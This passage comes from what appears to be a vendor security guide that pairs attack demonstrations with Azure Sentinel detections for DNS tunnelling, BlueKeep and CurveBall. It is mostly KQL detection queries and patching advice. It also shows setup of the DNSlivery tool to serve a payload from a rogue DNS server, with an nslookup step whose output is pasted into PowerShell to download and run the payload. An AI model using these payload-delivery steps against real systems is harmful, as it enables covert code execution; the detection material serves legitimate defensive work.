To set up the rogue DNS server itself you need a Linux op- erating system instance. You will also need Python3 and the right version of the Scapy library (v2.4.0). DNSlivery makes things easy for you, just run these commands: git clone https://github.com/no0be/DNSlivery.git && cd DNSliverysudo pip install -r requirements. txt Create a directory on disk that has the file that contains the payload you want to serve over DNS. In this sample we’ll be serving “atp-cat.txt” with an ASCII picture of a cat.

Run the following command: 93 sudo python3 dnslivery.py -p /path/to/the/pay- load

12.1.4 Consuming the payload on the target As mentioned earlier, DNSlivery is different from other solutions in that it does not require a dedicated client. The content can be consumed by Powershell out of the box.

On the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record. Copy and paste the response into the PowerShell console again, to retrieve the payload over DNS. nslookup -type=txt atp-cat-txt.print.yourrogue­ domain.net

Copy and paste the response into the PowerShell console again, to retrieve the payload over DNS:

94

12.1.5 How can I defend against these types of attacks? While most companies will have some form of network security solution in place that might already trigger on these types of attacks, Azure Sentinel can also play a role in detecting this malicious intent.

Looking at the Security eventlog on this specific server we find an event with ID 4688 that shows us the execution of the initial ‘dnslookup’.

If we execute a Kusto (KQL) query on the Log Analytics workspace that this agent is connected to, we quickly find the event:

SecurityEvent| search “nslookup” and “TXT” 95

12.1.6 Capturing the malicious transfer itself When we dig further, there is no logged event in the Windows security eventlog on the next stage of the attack that receives the multi-part base64 encoded payload. Because it uses Invoke-Expression (IEX) it does not spawn a new (child) process and therefore no extra event is created in the security eventlog.

However, we can use the DNS client logging in Windows. That is not enabled by default, but enterprises could (and should?) enable this.

12.1.7 Collecting the Powershell log Going into Workspace Settings in Azure Sentinel, you will find Advanced Settings of the Log Analytics workspace associat- ed and it will allow you to collect the DNS client log. 96 It will take a couple of minutes to start gathering and pro- cessing this new log, but directly afterwards you can query the data in Kusto format, returning the malicious command:

Event| where EventLog == “Microsoft-Win- dows-DNS-Client/Operational”| where Rendered­ Description contains “type 16”

12.1.8 Azure Sentinel The next step is to create a Case trigger in Azure Sentinel. This can be done through the ‘Analytics’ section. Here are the properties you can use:

• Status: Enabled • Name: Potential DNS tunnelling • Description: We've found a large number of DNS queries for TXT records in a short period, which might indicate malicious DNS tunnelling • Severity: High • Alert Query: Event | whereEventLog == "Microsoft-Win- dows-DNS-Client/Operational" | whereRenderedDescription contains "type 16" | extend HostCustomEntity = ComputerEntity mapping - Account: PRO TIP - Host: Computer Make sure you map the - IP address: Operator entities as part of the - Number of results greater rule creation — this is than: 5 a very important step 97 • Alert Scheduling since this will support - Frequency: 5 minutes the investigation. - Period: 5 minutesAlert suppression: On (for 60 min- utes)

12.1.9 Incidents Now that we created an advanced alert rule in Azure Sentinel, it will generate Incidents that you can assign and use to deeply investigate. 98 An incident can include multiple alerts. It’s an aggregation of all the relevant evidence for a specific investigation. In the Entities tab, you can see all the entities that are involved.

12.1.10 Conclusion A potentially better approach for enterprises is to block DNS port 53 traffic at the edge by default. This ensures that all port 53 traffic has to go out via the corporate DNS servers, providing a central point for logging. At that point it is sufficient to do centralized logging on the DNS server itself.

Without central logging, or if you do allow DNS traffic at the edge, client-level logging is valuable for detecting DNS tunneling attacks. Client-level logging also means you directly get the name of the impacted host in the logs, which is an added value for Threat Hunting.

While DNS client logging wasn’t there out-of-the-box, Azure Sentinel makes it easy to start detecting the DNS attack vector.

12.2 Use Case 2: Detect CVE-2019-0708 aka BlueKeep On May 14th 2019, Microsoft’s Security Response Center issued guidance that a vulnerability was found in Remote Desktop Services, formerly known as Terminal Services, allowing an unauthenticated hacker to execute 99 code on the target system. Windows 7, Windows Server 2008 and 2008 R2 are affected.

Microsoft issued a fix and advised to patch directly because the vulnerability is ‘wormable’ and to prevent a situation such as with WannaCry and others. Underlining the importance of the CVE is the fact that Microsoft backported the fix to Windows XP and Windows Server 2003. The vulnerability was nicknamed BlueKeep in the infosec community.

12.2.1 Patch Management is still a number 1 priority A good patch management strategy is commonly listed as one of the basics of an organizational cybersecurity strategy. Unfortunately, we still see companies not regularly patching their systems. This has a number of reasons: a lack of tech- nical staff can make updating a little scary, undermanned IT staff can become busy with problems perceived to be ‘more important’, and an often heard answer is that some updates can cause performance issues or ‘break stuff’. Regardless of the reasons why an organization may procrastinate when it comes to patching, it’s a critical process that needs to be in place.

The good news is that Microsoft Azure provides Update Management as a service. It’s technically part of Azure Se- 100 curity Center and uses the Microsoft Management Agent on your servers (which will likely already be there for monitoring, security management and other tasks) to report status and execute the fixes. If you’re in a hybrid world and want to cover your on-premises servers, Microsoft’s System Center Config- uration Manager (SCCM) together with Microsoft Intune is a great option as well.

12.2.2 Microsoft Defender ATP knows more about the CVE When a CVE is reported, one of the first things you’ll likely be doing is searching for more background information on this exploit. A good starting point could be the article that MSRC issued, or the corresponding document on MITRE’s website.

But if you’re using Microsoft Defender ATP, there is a section called Threat Analytics where the MDATP team regularly posts important information. On the day MSRC issued the guidance, the MDATP team put up an article about the CVE called “Wormable RCE vulnerability in RDP”. It has key insights, tasks that can be used for mitigation, links to the fixes, and much more. The best part though are the integrated dashboards: the page shows you which machines in your environment are exploitable.

101

The MDATP team also provides a KQL query that can identify machines with relatively intense outbound network activity on the common RDP port (TCP 3389) which you can use to find processes that might be scanning for possible targets or exhibiting worm-like behavior. let listMachines = MachineInfo | where OsVersion == “6.1” //Win7 and Srv2008 | distinct MachineId; NetworkCommunicationEvents | where RemotePort == 3389 | where Protocol == “Tcp” and ActionType == “Connection- Success” | where InitiatingProcessFileName !in~ //filter some legit programs (“mstsc.exe”,”RTSApp.exe”, “RTS2App.exe”,”RDCMan.exe”,”ws_ TunnelService.exe”,”RSSensor.exe” “RemoteDesktopManagerFree.exe”,”RemoteDesktopManager.ex- e”,”RemoteDesktopManager64.exe”, “mRemoteNG.exe”,”mRemote.exe”,”Terminals.exe”,”spice- works-finder.exe”, “FSDiscovery.exe”,”FSAssessment.exe”) | listMachines on MachineId | project EventTime, MachineId, ComputerName, RemoteIP, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessSHA1 | summarize conn=count() by MachineId, InitiatingProcess- FileName, bin(EventTime, 1d) 12.2.3 How many systems are vulnerable? A quick query at Shodan reveals that there are at least 2 Million machines connected to the internet that publicly expose RDP at the default port of 3389. Most of them in the US and China, and about 130K of them are hosted on 102 Amazon AWS. At the time of writing around 950K of them are vulnerable for BlueKeep.

GreyNoise is actively monitoring and observed sweeping tests for systems vulnerable to BlueKeep during the summer of 2019 from several dozen hosts around the Internet. Inter- esting fact: that activity has been observed from exclusively TOR exit nodes and is likely being executed by a single actor. PRO TIP Are you red teaming Besides disabling RDP and port 3389 when it’s and want to get more not needed, another important workaround information of the OS/ would be to enable Network Level Authenti- system you are cation (NLA) on systems running Windows 7, connecting to? If you Windows Server 2008 and 2008 R2. With NLA get prompted for a login turned on, an attacker would first need to au- for RDP before login thenticate to Remote Desktop Services using screen, enter .\guest no a valid account on the target system before password and it bumps the attacker could exploit the vulnerability. you to login screen. 12.2.4 Azure Cloud Shell & PowerShell can help Now, if you’re running your Windows VM’s in Azure, you might want to have a look at your Network Security Groups (NSG’s). This is the time where you will want to evaluate if having that port 3389 opened up to the internet is a good idea. (Answer: 103 nope).

Here’s a PowerShell script to check all of your Azure Sub- scriptions, and for each resource group query all the NSG’s to see if 3389 is open:

$subs = az account list — query “[].id” -o tsv foreach( $sub in $subs ) { az account set -s $sub $nsgList = az network nsg list — query “[].{Name:name, ResourceGroup:resource- Group}” | ConvertFrom-Jsonforeach( $nsg in $ns- gList ) { $rules = az network nsg rule list — nsg-name $nsg.Name -g $nsg.ResourceGroup — query “[?desti- nationPortRange==’3389'].{Name:name, ResourceGroup:resourceGroup}” | ConvertFrom-Json $rules } }

PRO TIP Another option to look at is the just released ‘Adaptive Network Hardening’ feature of Azure Security Center. It learns the network traffic and connectivity patterns of your Azure workloads and provides you with NSG rule recommendations for your internet-facing virtual machines. PRO TIP You can use Azure Cloud Shell to run this script!

104

12.2.5 InfoSec community at work The bigger danger at this stage is the exploitation of CVE- 2019–0708 once inside the organization to quickly compro- mise hosts and for Lateral Movement. And since the first real exploit proof of concept is publicly out there, we will leverage Azure Sentinel to build detection for BlueKeep.

So how do you start detecting potential BlueKeep related behavior? Markus Neis at Swisscom shared a Sigma rule to the GitHub repo for addressing Lateral Movement technique T1210 (exploitation of Remote Services) within 24 hours of the CVE becoming public knowledge. The same day, SOC Prime’s Roman Ranskyi also published a Sigma rule with detection logic extending to Masquerading technique T1036 and Network Service Scanning technique T1046.

Recently, somebody by the name Adam also shared his find- ings that account name AAAAAAA in a 4625 Windows Event is a potential indicator of people downloading a BlueKeep scanner from GitHub and running it without modification against an RDP server.

105

12.2.6 How to detect BlueKeep exploit usage in Azure Sentinel Azure Sentinel can help detect BlueKeep. By sourcing information from the Graph Security API, Azure Security Center, and many other sources, Microsoft’s coud SIEM can provide detection. Using the combined knowledge of the InfoSec community, it is easy to add the appropriate Alert Rules.

Here’s the KQL query to detect suspicious outbound RDP connections. It detects non-standard tools connecting to TCP port 3389 indicating possible lateral movement:

Event| parse EventData with* ‘Data Name=”Rule- Name”>’ RuleName ‘<’* ‘Data Name=”UtcTime”>’ UtcTime ‘<’* ‘Data Name=”ProcessGuid”>’ ProcessGuid ‘<’* ‘Data Name=”ProcessId”>’ ProcessId ‘<’* ‘Data Name=”Image”>’ Image ‘ <’* ‘Data Name=”User”>’ User ‘<’* ‘Data Name=”Protocol”>’ Protocol ‘<’* ‘Data Name= ”Initiated”>’ Initiated ‘<’* ‘Data Name= ”SourceIsIpv6">’ SourceIsIpv6 ‘<’* ‘Data Name= ”SourceIp”>’ SourceIp ‘<’* ‘Data Name= ”SourceHostname”>’ SourceHostname ‘<’* ‘Data Name=”SourcePort”>’ SourcePort ‘<’* ‘Data Name= ”SourcePortName”>’ SourcePortName ‘<’* ‘Data Name=”DestinationIsIpv6">’ DestinationIsIpv6 ‘<’* ‘Data Name=”DestinationIp”>’ DestinationIp ‘<’* ‘Data Name=”DestinationHostname”>’ Destina- 106 tionHostname ‘<’* ‘Data Name=”DestinationPort”>’ DestinationPort ‘<’* ‘Data Name=”DestinationPort- Name”>’ DestinationPortName ‘<’*| where ((EventID == “3” and DestinationPort == “3389”) and not(Im- age endswith “\\mstsc.exe”or Image endswith “\\ RTSApp.exe”or Image endswith “\\RTS2App.exe”or Image endswith “\\RDCMan.exe”or Image endswith “\\ws_TunnelService.exe”or Image endswith “\\ RSSensor.exe”or Image endswith “\\RemoteDesktop- ManagerFree.exe”or Image endswith “\\RemoteDesk- topManager.exe”or Image endswith “\\RemoteDesk- topManager64.exe”or Image endswith “\\mRemoteNG. exe”or Image endswith “\\mRemote.exe”or Image endswith “\\Terminals.exe”or Image endswith “\\ spiceworks-finder.exe”or Image endswith “\\FS- Discovery.exe”or Image endswith “\\ FSAssessment.exe”or Image endswith “\\MobaRTE.exe”or Image endswith “\\ PRO TIP chrome.exe”)) You will need to have SwiftOnSecurity’s Here’s the KQL query to detect the use of a Sysmon configuration scanner by zerosum0x0 that discovers targets installed on the RDP vulnerable to BlueKeep: and TS machines you will be protecting and SecurityEvent| where (EventID == monitoring. “4625” and AccountName == “AAAAAAA”)

107

12.2.7 What to do as a defender? Considering all the above, the top 3 things you can do as a defender are:

1. Deploy proactive detection. 2. Rigorously patch or mitigate the vulnerability. 3. Keep track on the situation development following input from researchers your trust.

Microsoft security really is more than 1 plus 1. When using a combination of Azure Sentinel, Azure Security Center, Microsoft Defender ATP, and Microsoft Intune, you get an integrated approach to protecting, detecting and responding to threats like BlueKeep.

12.3 Use Case 3: Detect CurveBall In january 2020, Microsoft has released a security update for Windows which includes a fix to a dangerous bug that would allow an attacker to spoof a certificate, making it look like it came from a trusted source. 108

The vulnerability (CVE-2020–0601) was reported to Microsoft by the NSA. The root cause of this vulnerability is a flawed implementation of the Elliptic Curve Cryptography (ECC) within Microsoft’s code.

Tal Be’ery, Microsoft’s security research manager, wrote an article explaining the root cause of the vulnerability using a Load Bearing analogy.

12.3.1 Watching the logs Windows has a function for publishing events when an attempted security vulnerability exploit is detected in your user-mode application called CveEventWrite. To my knowledge, the fix for CVE-2020–0601 is the first code to call this API. After the Windows update is applied, the system will gener- ate event ID 1 in the eventlog after each reboot under Windows Logs, Application when an attempt to exploit a known vulnerability is detected. This event is raised by a User mode process, and more information can be found in 109 the MSRC guidance for this fix.

12.3.2 Azure Sentinel By default the Log Analytics workspace powering Azure Sentinel will not collect events from the Application eventlog. You can change this by going to the Advanced Settings for your workspace, and adding Application as a source under Data, Windows Event Logs:

There are two ways of going about creating the Rule. Either you set up detection for event ID 1 in general so that you get alerted for any (future) CVE abuse, or you set up specific rules per CVE.

There will be pro’s or con’s to both approach. In this sample we’ll build a specific Rule to detect potential CVE-2020– 0601 abuse so that we can map it to the right MITRE tactics and follow specifically.

110

12.3.3 Alert rule Pete Bryan, who works at Microsoft’s Threat Intelligence Center (MSTIC), shared a sample KQL query that you can use:

Event | where Source ==”Microsoft-Windows-Audit-CVE” | where EventID == “1” | where RenderedDescription contains “CVE-2020– 0601”

Based on my own investigation, these MITRE TTP’s would be most applicable:

° T1036 — In case of fake certificates on binaries ° T1189 — In case of man-in-the-middle type of attacks ° T1116 — In case of code signing abuse

That means that we’ll be tagging the rule for Defense Evasion and Initial Access tactics.

111

12.3.4 AzSentinel powershell If you want to programmatically push this rule into your Azure Sentinel environment, go have a look at Wortell’s AzSentinel powershell module. In a previous chapter you can find more details about it.

12.4.5 Microsoft Defender ATP If you have Microsoft Defender ATP deployed across your enterprise (which now also supports MacOS), you will get the detection out of the box. The logic was added to MDATP at the same time that Microsoft released the fix.

And because MDATP is now unified with other the other Microsoft ATP products, the detection will also show up in the new Microsoft Threat Protection (MTP):

112

PRO TIP Microsoft Defender ATP can also be deployed on servers. For workloads 12.4.6 Analyzing your enterprise for living in Azure: CVE-2020–0601 attacks enable Azure Security The Microsoft Defender team also added a Center (standard) and dashboard in the Threat Analytics section the MDATP client will of MDATP. The dashboard shows you more be deployed and con- information about the CVE and whether or not figured automatically. endpoints in your organization were found to have been potentially abused.

However, Microsoft also released the hunting query that you could use to investigate. Here’s the KQL:

DeviceFileCertificateInfoBeta | where Timestamp > ago(30d) 113 | where IsSigned == 1 and IsTrusted == 1 and IsRootSignerMicrosoft == 1 | where SignatureType == "Embedded" | where Issuer !startswith "Microsoft" and Issuer !startswith "Windows" | project Timestamp, DeviceName,SHA1,Issuer, IssuerHash,Signer,SignerHash,Certificate­Creation Time,CertificateExpirationTime,CrlDistributionPo intUrls

12.4.7 Best of suite In the case that you have MDATP and or MTP, there is no need to create the Azure Sentinel rule(s). Just enable the Microsoft Defender ATP connector to Azure Sentinel and the alert will be created automatically. 114

Wortell MDR. Wortell MDR.

115

Wortell operates its own security operations center (SOC) which offers a 24x7 managed detection and response (MDR) services based on Azure Sentinel and the Microsoft Threat Protection suite.

24x7 MDR as-a-service Our 24x7 service combines signals from the Microsoft security solutions, and adds information from our in-house built platform that among other things leverages a Honeypot network, and combines this to Use Cases.

These Use Cases can be generic, such as monitoring for ‘lateral movement’ but they can also be specific and tailored for your organizations, such as extra monitoring for your most important data and resources.

We empower people.